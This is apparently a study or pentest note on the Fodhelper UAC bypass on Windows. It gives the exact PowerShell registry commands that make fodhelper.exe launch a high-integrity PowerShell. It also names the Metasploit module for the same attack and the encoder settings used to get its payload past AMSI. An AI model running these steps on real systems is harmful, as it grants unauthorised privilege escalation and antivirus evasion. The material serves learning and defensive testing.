## What's FodHelper?
The Fodhelper binary runs as _high integrity_, and as we will demonstrate, it is vulnerable to exploitation due to the way it interacts with the Windows Registry. More specifically, it interacts with the current user's registry, which we are allowed to modify.

This case study leverages a [UAC](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works) bypass that abuses the Fodhelper.exe application. This particular UAC bypass still works on the most recent Windows version at the time of this writing and does not rely on writing a file to disk.

## Theory
As reported in the original blog post, Fodhelper tries to locate the following registry key:
```PATH
HKCU:\Software\Classes\ms-settings\shell\open\command
```

If we create the registry key and add the _DelegateExecute_ value, Fodhelper will search for the default value _(Default)_ and use the content of the value to create a new process.
If our exploit creates the registry path and sets the _(Default)_ value to an executable (like powershell.exe), it will be spawned as a high integrity process when Fodhelper is started.

## Manual Bypass
We can use powershell to create the needed registry keys with associated values required to launch PowerShell.

The first command creates the registry path through the New-Item cmdlet and the -Path option. Additionally, it sets the value of the default key to "powershell.exe" through the -Value option while the -Force flag suppresses any warnings.

In the second command, the _DelegateExecute_ value is created through the similar New-ItemProperty cmdlet, again using the -Path option along with the -Name option to specify the value and the -PropertyType option to specify the type of value, in this case a String.\

Finally, fodhelper will be executed.

The 3 commands will be as follows:
```Powershell
New-Item -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Value powershell.exe –Force

New-ItemProperty -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Name DelegateExecute -PropertyType String -Force
```Powershell
C:\Windows\System32\fodhelper.exe
```

## Automated Bypass
We can also use the metasploit module to bypass uac using fodhelper:
exploit/windows/local/bypassuac_fodhelper

Our exploit does not work- as Windows AMSI qurantines the threat, however, by using an encoder with the following commands:
```sh
set EnableStageEncoding true
set StageEncoder x64/xor_dynamic
```
We can encode our payload to bypass UAC.

Running the exploit gives us an elevated shell.

__RESET ASMI__
```Cmd
reg add "HKCU\Software\Microsoft\Windows Script\Settings" /t REG_DWORD /v AmsiEnable /d 1 /f